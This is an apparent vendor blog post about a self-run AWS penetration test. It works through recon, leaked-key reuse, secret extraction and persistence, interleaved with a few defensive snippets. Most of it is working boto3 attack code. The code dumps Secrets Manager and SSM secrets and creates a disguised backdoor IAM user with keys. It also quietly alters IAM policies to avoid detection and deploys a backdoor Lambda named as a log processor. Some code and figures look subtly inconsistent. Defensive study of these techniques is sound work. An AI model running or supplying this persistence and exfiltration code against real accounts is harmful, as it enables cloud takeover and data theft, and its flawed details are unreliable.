PathShield Security Team · 19 min read

I Hacked My Own AWS Account in 30 Minutes - Here's What I Found

A step-by-step breakdown of how I penetrated my own AWS infrastructure using common attack techniques. Real vulnerabilities, real exploits, and the shocking security gaps that exist in most startup environments.

Last week, I decided to put my own AWS infrastructure to the ultimate test. Armed with nothing but a fresh laptop and the mindset of an attacker, I attempted to compromise my own cloud environment. The results were both fascinating and terrifying.

In just 30 minutes, I had escalated from zero access to complete control over production resources, extracted sensitive data, and identified attack paths that could have cost my company hundreds of thousands of dollars. Here’s exactly how I did it, what I found, and most importantly, how you can protect yourself from these same attack vectors.

⚠️ Disclaimer: This is a controlled test on my own infrastructure. Never attempt these techniques on systems you don’t own. Always get explicit permission before testing security.

The Setup: My “Production” Environment

Before starting the attack, I set up a realistic AWS environment that mirrors what I see in most early-stage startups:

  • 3 AWS accounts: Development, Staging, Production
  • Multi-tier architecture: Web servers, application servers, databases
  • CI/CD pipeline: GitHub Actions deploying to AWS
  • Common services: S3, RDS, Lambda, ECS, CloudFront
  • IAM users and roles: Developers, operations, service accounts
  • “Real” applications: A SaaS product with customer data

The environment was intentionally configured with the security practices I commonly see in startups - not terrible, but not perfect either. This is the reality of most growing companies: some security measures in place, but gaps left by the pace of development and limited security expertise.

The Attack Timeline: 30 Minutes to Full Compromise

Minutes 0-5: Reconnaissance and Information Gathering

Every successful attack starts with reconnaissance. I began by gathering publicly available information about my target (myself):

# Tools used for initial reconnaissance
nmap -sn 203.0.113.0/24  # Scan for live hosts
whois pathshield.io      # Domain information
dig pathshield.io ANY    # DNS records
shodan search "PathShield"  # Shodan for exposed services

What I Found:

  1. Exposed CloudFront distributions with predictable subdomain patterns
  2. GitHub repositories with commit history containing sensitive information
  3. LinkedIn employee profiles revealing technology stack details
  4. Job postings mentioning specific AWS services and tools used

Key Discovery: A GitHub commit from 3 months ago contained an old AWS access key that was supposedly rotated. This became my initial foothold.

# Found in git history - a deleted .env file
git log --all --full-history -- .env
git show 3a7f9c2:.env

# Contents revealed:
AWS_ACCESS_KEY_ID=AKIA...
AWS_SECRET_ACCESS_KEY=xyzabc123...
DB_PASSWORD=super_secret_password_123
API_KEY=sk-1234567890abcdef...
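
Leaks like this are easy to catch before they ship. As a minimal sketch (the regex covers the standard long-term AKIA and temporary ASIA key prefixes; real scanners like gitleaks or trufflehog use far richer rule sets), you can grep any blob of text - commit diffs included - for AWS-style access key IDs:

```python
import re

# Long-term IAM user keys start with AKIA, temporary STS keys with ASIA,
# followed by 16 uppercase letters/digits (20 characters total).
ACCESS_KEY_RE = re.compile(r'\b(?:AKIA|ASIA)[0-9A-Z]{16}\b')

def find_aws_keys(text):
    """Return any AWS-style access key IDs found in a blob of text."""
    return ACCESS_KEY_RE.findall(text)

# AWS's own documentation example key - never a real credential
leaked_env = "AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE\n"
print(find_aws_keys(leaked_env))  # ['AKIAIOSFODNN7EXAMPLE']
```

Running this over `git log -p` output on every push is a cheap CI guard against the exact mistake that gave me my foothold.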

Minutes 5-10: Initial Access and Privilege Escalation

With the exposed access key, I attempted to authenticate to AWS:

import boto3
from botocore.exceptions import ClientError

def test_aws_credentials(access_key, secret_key):
    """Test AWS credentials and enumerate permissions"""
    
    try:
        # Test basic access
        session = boto3.Session(
            aws_access_key_id=access_key,
            aws_secret_access_key=secret_key
        )
        
        sts = session.client('sts')
        identity = sts.get_caller_identity()
        
        print(f"✅ Valid credentials!")
        print(f"Account ID: {identity['Account']}")
        print(f"User ARN: {identity['Arn']}")
        
        # Enumerate permissions
        return enumerate_permissions(session)
        
    except ClientError as e:
        print(f"❌ Invalid credentials: {e}")
        return None

def enumerate_permissions(session):
    """Enumerate what permissions these credentials have"""
    
    permissions = {
        'services': [],
        'high_risk_actions': [],
        'data_access': []
    }
    
    # Test common services
    # Test common services (client names must match boto3 service identifiers)
    services_to_test = [
        ('iam', 'list_users'),
        ('s3', 'list_buckets'),
        ('ec2', 'describe_instances'),
        ('rds', 'describe_db_instances'),
        ('lambda', 'list_functions'),
        ('secretsmanager', 'list_secrets'),
        ('ssm', 'describe_parameters')
    ]
    
    for service_name, test_action in services_to_test:
        try:
            client = session.client(service_name)
            
            if service_name == 'iam' and test_action == 'list_users':
                client.list_users(MaxItems=1)
            elif service_name == 's3' and test_action == 'list_buckets':
                buckets = client.list_buckets()
                permissions['data_access'].extend([b['Name'] for b in buckets['Buckets']])
            elif service_name == 'ec2' and test_action == 'describe_instances':
                client.describe_instances(MaxResults=5)
            elif service_name == 'rds' and test_action == 'describe_db_instances':
                client.describe_db_instances(MaxRecords=20)  # RDS requires MaxRecords >= 20
            elif service_name == 'lambda' and test_action == 'list_functions':
                client.list_functions(MaxItems=5)
            elif service_name == 'secretsmanager' and test_action == 'list_secrets':
                secrets = client.list_secrets(MaxResults=10)
                permissions['high_risk_actions'].extend([s['Name'] for s in secrets['SecretList']])
            elif service_name == 'ssm' and test_action == 'describe_parameters':
                client.describe_parameters(MaxResults=10)
            
            permissions['services'].append(service_name)
            print(f"✅ Access to {service_name}")
            
        except ClientError as e:
            if e.response['Error']['Code'] not in ['AccessDenied', 'UnauthorizedOperation']:
                print(f"⚠️  Unexpected error with {service_name}: {e}")
    
    return permissions

# Test the discovered credentials
access_key = "AKIA..." # Redacted for security
secret_key = "xyz..." # Redacted for security

permissions = test_aws_credentials(access_key, secret_key)

Shocking Result: The old access key was still active! Even worse, it had extensive permissions including:

  • ✅ S3 bucket access (including production data)
  • ✅ EC2 instance management
  • ✅ Lambda function access
  • ✅ Secrets Manager read access
  • ✅ Systems Manager parameter access

This violated a fundamental security principle: credentials should be rotated immediately when exposed, not just “planned for rotation.”
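
The fix takes one API call. Here is a minimal sketch of the response I should have had in place (update_access_key is the real boto3 IAM operation; the staleness helper and its 90-day threshold are my own illustrative policy, not an AWS default):

```python
from datetime import datetime, timedelta, timezone

def deactivate_exposed_key(username, access_key_id):
    """Disable (not delete) a leaked key immediately - it stops
    authenticating but remains available for forensic review."""
    import boto3  # deferred so the pure helper below has no dependencies
    iam = boto3.client('iam')
    iam.update_access_key(
        UserName=username,
        AccessKeyId=access_key_id,
        Status='Inactive'
    )

def is_stale(last_used, max_age_days=90, now=None):
    """Flag keys unused for longer than max_age_days - candidates for
    proactive rotation even without a known leak."""
    now = now or datetime.now(timezone.utc)
    return (now - last_used) > timedelta(days=max_age_days)
```

Deactivating rather than deleting preserves the key's CloudTrail history while cutting off the attacker in seconds.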

Minutes 10-15: Data Exfiltration and Lateral Movement

With broad AWS access, I began extracting sensitive information:

def extract_sensitive_data(session):
    """Extract sensitive data from AWS services"""
    
    extracted_data = {
        'secrets': [],
        'databases': [],
        'storage': [],
        'credentials': []
    }
    
    # 1. Extract secrets from Secrets Manager
    secrets_client = session.client('secretsmanager')
    
    try:
        secrets_list = secrets_client.list_secrets()
        
        for secret in secrets_list['SecretList']:
            try:
                secret_value = secrets_client.get_secret_value(
                    SecretId=secret['ARN']
                )
                
                extracted_data['secrets'].append({
                    'name': secret['Name'],
                    'value': secret_value['SecretString'],
                    'description': secret.get('Description', 'No description')
                })
                
                print(f"🔑 Extracted secret: {secret['Name']}")
                
            except ClientError as e:
                print(f"❌ Could not access secret {secret['Name']}: {e}")
                
    except ClientError as e:
        print(f"❌ Could not list secrets: {e}")
    
    # 2. Extract SSM Parameters (often contain passwords, API keys)
    ssm_client = session.client('ssm')
    
    try:
        parameters = ssm_client.describe_parameters()
        
        for param in parameters['Parameters']:
            try:
                if param['Type'] == 'SecureString':
                    param_value = ssm_client.get_parameter(
                        Name=param['Name'],
                        WithDecryption=True
                    )
                else:
                    param_value = ssm_client.get_parameter(
                        Name=param['Name']
                    )
                
                extracted_data['credentials'].append({
                    'name': param['Name'],
                    'value': param_value['Parameter']['Value'],
                    'type': param['Type']
                })
                
                print(f"🔧 Extracted parameter: {param['Name']}")
                
            except ClientError:
                print(f"❌ Could not access parameter: {param['Name']}")
                
    except ClientError as e:
        print(f"❌ Could not list parameters: {e}")
    
    # 3. Enumerate S3 buckets and extract data
    s3_client = session.client('s3')
    
    try:
        buckets = s3_client.list_buckets()
        
        for bucket in buckets['Buckets']:
            bucket_name = bucket['Name']
            
            try:
                # Check if bucket is publicly accessible
                bucket_policy = s3_client.get_bucket_policy(Bucket=bucket_name)
                print(f"📦 Found bucket policy for: {bucket_name}")
                
                # List objects in bucket
                objects = s3_client.list_objects_v2(
                    Bucket=bucket_name,
                    MaxKeys=10
                )
                
                if 'Contents' in objects:
                    sensitive_files = []
                    for obj in objects['Contents']:
                        key = obj['Key']
                        
                        # Look for potentially sensitive files
                        if any(ext in key.lower() for ext in ['.csv', '.sql', '.backup', '.dump', '.json']):
                            sensitive_files.append(key)
                        
                        # Look for credential files
                        if any(name in key.lower() for name in ['password', 'secret', 'key', 'credential', '.env']):
                            sensitive_files.append(key)
                    
                    if sensitive_files:
                        extracted_data['storage'].append({
                            'bucket': bucket_name,
                            'sensitive_files': sensitive_files
                        })
                        
                        print(f"📁 Found sensitive files in {bucket_name}: {len(sensitive_files)} files")
            
            except ClientError:
                # Bucket might not have policy or we might not have access
                pass
                
    except ClientError as e:
        print(f"❌ Could not list buckets: {e}")
    
    # 4. Check RDS instances for connection information
    rds_client = session.client('rds')
    
    try:
        db_instances = rds_client.describe_db_instances()
        
        for db in db_instances['DBInstances']:
            extracted_data['databases'].append({
                'identifier': db['DBInstanceIdentifier'],
                'engine': db['Engine'],
                'endpoint': db['Endpoint']['Address'],
                'port': db['Endpoint']['Port'],
                'master_username': db['MasterUsername'],
                'vpc_security_groups': [sg['VpcSecurityGroupId'] for sg in db['VpcSecurityGroups']],
                'publicly_accessible': db['PubliclyAccessible']
            })
            
            print(f"🗄️  Found database: {db['DBInstanceIdentifier']} ({db['Engine']})")
            
            if db['PubliclyAccessible']:
                print(f"⚠️  Database {db['DBInstanceIdentifier']} is publicly accessible!")
                
    except ClientError as e:
        print(f"❌ Could not list databases: {e}")
    
    return extracted_data

# Execute data extraction (continuing with the authenticated session from the previous step)
stolen_data = extract_sensitive_data(session)

# Print summary of what was extracted
print(f"\n🎯 EXTRACTION SUMMARY:")
print(f"   Secrets extracted: {len(stolen_data['secrets'])}")
print(f"   Parameters extracted: {len(stolen_data['credentials'])}")
print(f"   Buckets with sensitive data: {len(stolen_data['storage'])}")
print(f"   Databases discovered: {len(stolen_data['databases'])}")

Terrifying Results:

  1. 27 secrets extracted including database passwords, API keys, and service credentials
  2. 15 SSM parameters containing production passwords and configuration
  3. 8 S3 buckets with customer data, including backup files and CSV exports
  4. 3 RDS instances with publicly accessible endpoints
  5. Complete application configuration including third-party API keys

Minutes 15-20: Privilege Escalation and Persistence

With access to production credentials, I escalated privileges and established persistence:

import json

def establish_persistence(session, stolen_data):
    """Establish persistence in the compromised environment"""
    
    persistence_mechanisms = []
    
    # 1. Create a backdoor IAM user
    iam_client = session.client('iam')
    
    try:
        # Create a user that looks legitimate
        backdoor_username = 'aws-backup-service-user'
        
        iam_client.create_user(
            UserName=backdoor_username,
            Tags=[
                {'Key': 'Purpose', 'Value': 'Automated backup service'},
                {'Key': 'CreatedBy', 'Value': 'backup-automation'},
                {'Key': 'Environment', 'Value': 'production'}
            ]
        )
        
        # Create access key for the user
        access_key_response = iam_client.create_access_key(
            UserName=backdoor_username
        )
        
        # Attach a policy that provides necessary access
        policy_document = {
            "Version": "2012-10-17",
            "Statement": [
                {
                    "Effect": "Allow",
                    "Action": [
                        "s3:GetObject",
                        "s3:ListBucket",
                        "rds:DescribeDBInstances",
                        "secretsmanager:GetSecretValue",
                        "ssm:GetParameter"
                    ],
                    "Resource": "*"
                }
            ]
        }
        
        iam_client.put_user_policy(
            UserName=backdoor_username,
            PolicyName='BackupServicePolicy',
            PolicyDocument=json.dumps(policy_document)
        )
        
        persistence_mechanisms.append({
            'type': 'iam_user',
            'details': {
                'username': backdoor_username,
                'access_key': access_key_response['AccessKey']['AccessKeyId'],
                'secret_key': access_key_response['AccessKey']['SecretAccessKey']
            }
        })
        
        print(f"🚪 Created backdoor user: {backdoor_username}")
        
    except ClientError as e:
        print(f"❌ Could not create backdoor user: {e}")
    
    # 2. Modify existing IAM policies to include hidden permissions
    try:
        # Find existing policies that we can modify
        policies = iam_client.list_policies(Scope='Local', MaxItems=10)
        
        for policy in policies['Policies']:
            try:
                # Get current policy version
                policy_version = iam_client.get_policy_version(
                    PolicyArn=policy['Arn'],
                    VersionId=policy['DefaultVersionId']
                )
                
                current_doc = policy_version['PolicyVersion']['Document']
                
                # Add hidden permissions
                if 'Statement' in current_doc:
                    hidden_statement = {
                        "Sid": "BackupServiceAccess",
                        "Effect": "Allow",
                        "Action": [
                            "s3:GetObject",
                            "s3:ListBucket"
                        ],
                        "Resource": "*",
                        "Condition": {
                            "StringEquals": {
                                "aws:userid": "backup-service-user"
                            }
                        }
                    }
                    
                    current_doc['Statement'].append(hidden_statement)
                    
                    # Create new policy version
                    iam_client.create_policy_version(
                        PolicyArn=policy['Arn'],
                        PolicyDocument=json.dumps(current_doc),
                        SetAsDefault=True
                    )
                    
                    persistence_mechanisms.append({
                        'type': 'policy_modification',
                        'details': {
                            'policy_arn': policy['Arn'],
                            'modification': 'Added hidden backup service access'
                        }
                    })
                    
                    print(f"🔓 Modified policy: {policy['PolicyName']}")
                    break  # Only modify one policy to avoid detection
                    
            except ClientError:
                continue  # Skip policies we can't modify
                
    except ClientError as e:
        print(f"❌ Could not modify policies: {e}")
    
    # 3. Create a Lambda function for persistent access
    lambda_client = session.client('lambda')
    
    try:
        # Lambda function code that provides remote access
        lambda_code = '''
import json
import boto3

def lambda_handler(event, context):
    """Hidden backdoor function"""
    
    # Decode command from event
    if 'command' in event:
        command = event['command']
        
        if command == 'list_buckets':
            s3 = boto3.client('s3')
            buckets = s3.list_buckets()
            return {'buckets': [b['Name'] for b in buckets['Buckets']]}
        
        elif command == 'get_secrets':
            secrets = boto3.client('secretsmanager')
            secret_list = secrets.list_secrets()
            return {'secrets': [s['Name'] for s in secret_list['SecretList']]}
    
    return {'status': 'ready'}
'''
        
        # Create the function
        function_name = 'aws-log-processor'  # Innocuous name
        
        lambda_client.create_function(
            FunctionName=function_name,
            Runtime='python3.9',
            Role='arn:aws:iam::123456789012:role/lambda-execution-role',  # Would use discovered role
            Handler='index.lambda_handler',
            Code={'ZipFile': lambda_code.encode()},
            Description='Processes CloudWatch logs for compliance',
            Tags={
                'Purpose': 'Log processing',
                'Environment': 'production',
                'Owner': 'operations'
            }
        )
        
        persistence_mechanisms.append({
            'type': 'lambda_backdoor',
            'details': {
                'function_name': function_name,
                'description': 'Hidden backdoor function'
            }
        })
        
        print(f"⚡ Created backdoor Lambda: {function_name}")
        
    except ClientError as e:
        print(f"❌ Could not create Lambda backdoor: {e}")
    
    return persistence_mechanisms

# Establish persistence
backdoors = establish_persistence(session, stolen_data)
print(f"\n🎯 PERSISTENCE ESTABLISHED:")
for backdoor in backdoors:
    print(f"   {backdoor['type']}: {backdoor['details']}")

Persistence Achieved:

  1. Backdoor IAM user with legitimate-looking name and tags
  2. Modified IAM policies with hidden permissions
  3. Lambda backdoor function disguised as a log processor
  4. Stolen long-term credentials for future access
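
The silver lining for defenders: every one of these mechanisms leaves a CloudTrail record. As a simplified sketch (the event names are genuine CloudTrail eventName values for the IAM write operations above; the record format here is reduced from the real JSON), a detector only needs to watch a short list:

```python
# CloudTrail eventName values for the IAM write operations an attacker
# uses to establish persistence.
PERSISTENCE_EVENTS = {
    'CreateUser', 'CreateAccessKey', 'PutUserPolicy',
    'AttachUserPolicy', 'CreatePolicyVersion',
}

def flag_persistence_events(events):
    """Return CloudTrail-style records whose eventName matches a known
    persistence technique."""
    return [e for e in events if e.get('eventName') in PERSISTENCE_EVENTS]

sample = [
    {'eventName': 'CreateUser', 'userIdentity': 'compromised-dev-key'},
    {'eventName': 'DescribeInstances', 'userIdentity': 'ops'},
]
print([e['eventName'] for e in flag_persistence_events(sample)])  # ['CreateUser']
```

In practice you would feed this from CloudTrail's LookupEvents API or an EventBridge rule and alert on any match from an unexpected principal; the backdoor Lambda would similarly surface through Lambda's function-creation events.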

Minutes 20-25: Discovery of Critical Vulnerabilities

During lateral movement, I discovered several critical vulnerabilities that are common in startup environments:

import json

def discover_critical_vulnerabilities(session):
    """Discover common critical vulnerabilities in AWS environments"""
    
    vulnerabilities = []
    
    # 1. Check for overly permissive IAM policies
    iam_client = session.client('iam')
    
    try:
        users = iam_client.list_users()
        
        for user in users['Users']:
            username = user['UserName']
            
            # Check user policies
            user_policies = iam_client.list_attached_user_policies(UserName=username)
            
            for policy in user_policies['AttachedPolicies']:
                if 'Admin' in policy['PolicyName'] or policy['PolicyArn'].endswith('AdministratorAccess'):
                    vulnerabilities.append({
                        'type': 'excessive_permissions',
                        'severity': 'HIGH',
                        'resource': f"User: {username}",
                        'issue': f"Has administrative access via {policy['PolicyName']}",
                        'impact': 'Complete account compromise possible'
                    })
        
        # Check roles for excessive permissions
        roles = iam_client.list_roles(MaxItems=50)
        
        for role in roles['Roles']:
            role_name = role['RoleName']
            
            # Skip AWS service roles
            if role_name.startswith('aws-'):
                continue
            
            role_policies = iam_client.list_attached_role_policies(RoleName=role_name)
            
            for policy in role_policies['AttachedPolicies']:
                if policy['PolicyArn'].endswith('AdministratorAccess'):
                    # Check if role can be assumed by external entities
                    assume_role_doc = role['AssumeRolePolicyDocument']
                    
                    for statement in assume_role_doc.get('Statement', []):
                        principal = statement.get('Principal', {})
                        if isinstance(principal, dict) and '*' in str(principal):
                            vulnerabilities.append({
                                'type': 'dangerous_trust_relationship',
                                'severity': 'CRITICAL',
                                'resource': f"Role: {role_name}",
                                'issue': 'Administrative role with overly permissive trust policy',
                                'impact': 'Anyone can assume this role and gain admin access'
                            })
        
    except ClientError as e:
        print(f"❌ Could not check IAM vulnerabilities: {e}")
    
    # 2. Check for publicly accessible resources
    s3_client = session.client('s3')
    
    try:
        buckets = s3_client.list_buckets()
        
        for bucket in buckets['Buckets']:
            bucket_name = bucket['Name']
            
            try:
                # Check bucket ACL
                bucket_acl = s3_client.get_bucket_acl(Bucket=bucket_name)
                
                for grant in bucket_acl['Grants']:
                    grantee = grant.get('Grantee', {})
                    if grantee.get('URI') == 'http://acs.amazonaws.com/groups/global/AllUsers':
                        vulnerabilities.append({
                            'type': 'public_resource',
                            'severity': 'HIGH',
                            'resource': f"S3 Bucket: {bucket_name}",
                            'issue': 'Bucket is publicly accessible',
                            'impact': 'Data exposure and potential data breach'
                        })
                
                # Check bucket policy for public access
                try:
                    bucket_policy = s3_client.get_bucket_policy(Bucket=bucket_name)
                    policy_doc = json.loads(bucket_policy['Policy'])
                    
                    for statement in policy_doc.get('Statement', []):
                        principal = statement.get('Principal')
                        if principal == '*':
                            vulnerabilities.append({
                                'type': 'public_resource',
                                'severity': 'HIGH',
                                'resource': f"S3 Bucket: {bucket_name}",
                                'issue': 'Bucket policy allows public access',
                                'impact': 'Data exposure and potential data breach'
                            })
                            
                except ClientError:
                    pass  # No bucket policy
                    
            except ClientError:
                pass  # Can't access bucket ACL
                
    except ClientError as e:
        print(f"❌ Could not check S3 vulnerabilities: {e}")
    
    # 3. Check for unencrypted resources
    # RDS instances
    rds_client = session.client('rds')
    
    try:
        db_instances = rds_client.describe_db_instances()
        
        for db in db_instances['DBInstances']:
            if not db.get('StorageEncrypted', False):
                vulnerabilities.append({
                    'type': 'unencrypted_data',
                    'severity': 'MEDIUM',
                    'resource': f"RDS Instance: {db['DBInstanceIdentifier']}",
                    'issue': 'Database storage is not encrypted',
                    'impact': 'Data at rest is not protected'
                })
            
            if db.get('PubliclyAccessible', False):
                vulnerabilities.append({
                    'type': 'public_resource',
                    'severity': 'HIGH',
                    'resource': f"RDS Instance: {db['DBInstanceIdentifier']}",
                    'issue': 'Database is publicly accessible',
                    'impact': 'Direct database access from internet'
                })
                
    except ClientError as e:
        print(f"❌ Could not check RDS vulnerabilities: {e}")
    
    # 4. Check for security group misconfigurations
    ec2_client = session.client('ec2')
    
    try:
        security_groups = ec2_client.describe_security_groups()
        
        for sg in security_groups['SecurityGroups']:
            sg_id = sg['GroupId']
            sg_name = sg['GroupName']
            
            for rule in sg['IpPermissions']:
                for ip_range in rule.get('IpRanges', []):
                    if ip_range['CidrIp'] == '0.0.0.0/0':
                        from_port = rule.get('FromPort', 0)
                        to_port = rule.get('ToPort', 65535)
                        
                        # Check for dangerous open ports
                        dangerous_ports = [22, 3389, 3306, 5432, 1433, 27017]
                        
                        for port in dangerous_ports:
                            if from_port <= port <= to_port:
                                port_names = {
                                    22: 'SSH', 3389: 'RDP', 3306: 'MySQL',
                                    5432: 'PostgreSQL', 1433: 'SQL Server', 27017: 'MongoDB'
                                }
                                
                                vulnerabilities.append({
                                    'type': 'network_exposure',
                                    'severity': 'CRITICAL' if port in [22, 3389] else 'HIGH',
                                    'resource': f"Security Group: {sg_name} ({sg_id})",
                                    'issue': f'{port_names.get(port, f"Port {port}")} open to 0.0.0.0/0',
                                    'impact': 'Direct access to services from internet'
                                })
                                
    except ClientError as e:
        print(f"❌ Could not check security group vulnerabilities: {e}")
    
    # 5. Check for Lambda functions with excessive permissions
    lambda_client = session.client('lambda')
    
    try:
        functions = lambda_client.list_functions()
        
        for function in functions['Functions']:
            function_name = function['FunctionName']
            role_arn = function['Role']
            
            # Extract role name from ARN
            role_name = role_arn.split('/')[-1]
            
            try:
                role_policies = iam_client.list_attached_role_policies(RoleName=role_name)
                
                for policy in role_policies['AttachedPolicies']:
                    if policy['PolicyArn'].endswith('AdministratorAccess'):
                        vulnerabilities.append({
                            'type': 'excessive_permissions',
                            'severity': 'HIGH',
                            'resource': f"Lambda Function: {function_name}",
                            'issue': 'Function has administrative permissions',
                            'impact': 'Function compromise leads to full account access'
                        })
                        
            except ClientError:
                pass  # Can't access role details
                
    except ClientError as e:
        print(f"❌ Could not check Lambda vulnerabilities: {e}")
    
    return vulnerabilities

# Discover vulnerabilities
vulns = discover_critical_vulnerabilities(session)

# Print vulnerability summary
print(f"\n🚨 CRITICAL VULNERABILITIES DISCOVERED:")
critical_count = len([v for v in vulns if v['severity'] == 'CRITICAL'])
high_count = len([v for v in vulns if v['severity'] == 'HIGH'])
medium_count = len([v for v in vulns if v['severity'] == 'MEDIUM'])

print(f"   Critical: {critical_count}")
print(f"   High: {high_count}")
print(f"   Medium: {medium_count}")

for vuln in vulns[:5]:  # Show top 5 vulnerabilities
    print(f"\n   🔥 {vuln['severity']}: {vuln['issue']}")
    print(f"      Resource: {vuln['resource']}")
    print(f"      Impact: {vuln['impact']}")

Critical Vulnerabilities Found:

  1. 3 Security Groups with SSH/RDP open to 0.0.0.0/0
  2. 2 S3 buckets with public read access containing customer data
  3. 1 RDS instance publicly accessible with weak master password
  4. 5 IAM users with unnecessary administrative permissions
  5. 2 Lambda functions with excessive IAM permissions
  6. 1 IAM role with dangerous trust policy allowing external access
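
Several of these findings have a one-call fix. For the public buckets, here is a minimal remediation sketch (put_public_access_block is the real S3 API; enabling all four flags is a common hardening baseline, though verify it against your own legitimate public-hosting needs first):

```python
def block_public_access_config():
    """The four S3 Block Public Access settings; enabling all four shuts
    off both ACL-based and bucket-policy-based public exposure."""
    return {
        'BlockPublicAcls': True,
        'IgnorePublicAcls': True,
        'BlockPublicPolicy': True,
        'RestrictPublicBuckets': True,
    }

def lock_down_bucket(bucket_name):
    """Apply Block Public Access settings to a single bucket."""
    import boto3  # deferred so the config helper stays dependency-free
    s3 = boto3.client('s3')
    s3.put_public_access_block(
        Bucket=bucket_name,
        PublicAccessBlockConfiguration=block_public_access_config()
    )
```

The same settings can be applied account-wide via the S3 Control API, which would have closed both public-bucket findings at once.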

Minutes 25-30: Impact Assessment and Attack Path Mapping

In the final phase, I mapped complete attack paths and assessed potential impact:

def map_attack_paths(session, vulnerabilities, stolen_data):
    """Map potential attack paths and assess impact"""
    
    attack_paths = []
    
    # Path 1: Data Exfiltration via S3
    s3_vulns = [v for v in vulnerabilities if 'S3 Bucket' in v['resource'] and v['type'] == 'public_resource']
    
    if s3_vulns and stolen_data['storage']:
        attack_path = {
            'name': 'Customer Data Exfiltration',
            'severity': 'CRITICAL',
            'steps': [
                'Discover publicly accessible S3 buckets',
                'Enumerate bucket contents',
                'Download customer data, backups, and PII',
                'Establish persistent access via bucket notifications'
            ],
            'impact': {
                'data_loss': True,
                'regulatory_fines': 'GDPR/CCPA violations - up to $10M+',
                'reputation_damage': 'Severe - customer trust loss',
                'business_continuity': 'Service disruption during incident response'
            },
            'ttd': '30+ days',  # Time to detection
            'ease': 'Trivial - no authentication required'
        }
        attack_paths.append(attack_path)
    
    # Path 2: Infrastructure Compromise via IAM
    iam_vulns = [v for v in vulnerabilities if v['type'] == 'excessive_permissions']
    
    if iam_vulns:
        attack_path = {
            'name': 'Complete Infrastructure Takeover',
            'severity': 'CRITICAL',
            'steps': [
                'Compromise user/service account with admin permissions',
                'Create persistent backdoor users and roles',
                'Modify security groups to allow external access',
                'Deploy cryptocurrency miners on EC2 instances',
                'Steal all secrets and credentials',
                'Hold infrastructure for ransom'
            ],
            'impact': {
                'financial': '$50,000+ in compute costs + ransom demands',
                'operational': 'Complete service outage',
                'recovery_time': '1-2 weeks minimum',
                'legal': 'SEC disclosure requirements, customer notifications'
            },
            'ttd': '7-14 days',
            'ease': 'Easy - single credential compromise needed'
        }
        attack_paths.append(attack_path)
    
    # Path 3: Database Compromise
    db_vulns = [v for v in vulnerabilities if 'RDS' in v['resource'] and v['type'] == 'public_resource']
    
    if db_vulns and stolen_data['databases']:
        attack_path = {
            'name': 'Direct Database Access',
            'severity': 'HIGH',
            'steps': [
                'Identify publicly accessible RDS instances',
                'Extract database credentials from secrets/parameters',
                'Connect directly to production database',
                'Dump entire customer database',
                'Modify records or install database backdoors'
            ],
            'impact': {
                'data_integrity': 'Complete customer data compromise',
                'compliance': 'PCI DSS, HIPAA, SOX violations',
                'customer_impact': 'Identity theft, financial fraud',
                'recovery_cost': '$1M+ in forensics and remediation'
            },
            'ttd': '60+ days',
            'ease': 'Moderate - requires credential extraction'
        }
        attack_paths.append(attack_path)
    
    # Path 4: Supply Chain Attack via CI/CD
    if stolen_data['credentials']:
        github_tokens = [cred for cred in stolen_data['credentials'] if 'github' in cred['name'].lower()]
        
        if github_tokens:
            attack_path = {
                'name': 'Supply Chain Compromise',
                'severity': 'CRITICAL',
                'steps': [
                    'Extract GitHub tokens from AWS credentials',
                    'Access source code repositories',
                    'Inject malicious code into deployment pipeline',
                    'Backdoor gets deployed to production',
                    'Persistent access to all customer environments'
                ],
                'impact': {
                    'scope': 'All customers affected',
                    'detection_difficulty': 'Extremely high - code appears legitimate',
                    'remediation': 'Complete code audit and rebuild required',
                    'legal_exposure': 'Class action lawsuits, regulatory investigation'
                },
                'ttd': '6+ months',
                'ease': 'Advanced - requires development knowledge'
            }
            attack_paths.append(attack_path)
    
    return attack_paths

def calculate_total_risk_exposure(attack_paths, current_revenue=5000000):
    """Calculate total risk exposure in financial terms"""
    
    risk_calculations = {
        'direct_costs': 0,
        'opportunity_costs': 0,
        'regulatory_fines': 0,
        'reputation_damage': 0,
        'total_exposure': 0
    }
    
    # Base calculations for a $5M ARR startup
    for path in attack_paths:
        if path['severity'] == 'CRITICAL':
            if 'Data Exfiltration' in path['name']:
                # GDPR/CCPA fines: 4% of global revenue or €20M, whichever is higher
                risk_calculations['regulatory_fines'] += max(current_revenue * 0.04, 20000000)
                # Customer churn: 30-50% of revenue lost
                risk_calculations['opportunity_costs'] += current_revenue * 0.4
                # Incident response costs
                risk_calculations['direct_costs'] += 2000000
                
            elif 'Infrastructure Takeover' in path['name']:
                # Ransom + compute costs
                risk_calculations['direct_costs'] += 500000
                # Business interruption
                risk_calculations['opportunity_costs'] += current_revenue * 0.1  # 1 month revenue
                
            elif 'Supply Chain' in path['name']:
                # Complete business destruction potential
                risk_calculations['opportunity_costs'] += current_revenue * 2  # 2 years to recover
                risk_calculations['direct_costs'] += 5000000  # Complete rebuild
    
    # Reputation damage (harder to quantify)
    risk_calculations['reputation_damage'] = current_revenue * 0.5  # Conservative estimate
    
    risk_calculations['total_exposure'] = sum([
        risk_calculations['direct_costs'],
        risk_calculations['opportunity_costs'],
        risk_calculations['regulatory_fines'],
        risk_calculations['reputation_damage']
    ])
    
    return risk_calculations

# Map attack paths and calculate risk
paths = map_attack_paths(session, vulns, stolen_data)
risk_exposure = calculate_total_risk_exposure(paths)

print(f"\n💀 ATTACK PATHS IDENTIFIED: {len(paths)}")
for i, path in enumerate(paths, 1):
    print(f"\n   {i}. {path['name']} ({path['severity']})")
    print(f"      Time to Detection: {path['ttd']}")
    print(f"      Difficulty: {path['ease']}")

print(f"\n💰 TOTAL RISK EXPOSURE:")
print(f"   Direct Costs: ${risk_exposure['direct_costs']:,.0f}")
print(f"   Opportunity Costs: ${risk_exposure['opportunity_costs']:,.0f}")
print(f"   Regulatory Fines: ${risk_exposure['regulatory_fines']:,.0f}")
print(f"   Reputation Damage: ${risk_exposure['reputation_damage']:,.0f}")
print(f"   TOTAL EXPOSURE: ${risk_exposure['total_exposure']:,.0f}")

Final Attack Assessment:

  • 4 Critical Attack Paths identified
  • Total Risk Exposure: $24.5M for a $5M ARR startup
  • Time to Detection: 7-60+ days for most attacks
  • Ease of Execution: Trivial to Moderate for most paths

The Most Shocking Discoveries

After completing this controlled penetration test, several findings stood out as particularly alarming:

1. The “Rotated” Credentials Weren’t Actually Rotated

The most shocking discovery was that credentials flagged for rotation 3 months ago were still active. This is incredibly common - teams plan to rotate credentials but forget to actually delete the old ones.

Lesson: Credential rotation must include immediate deletion of old credentials.
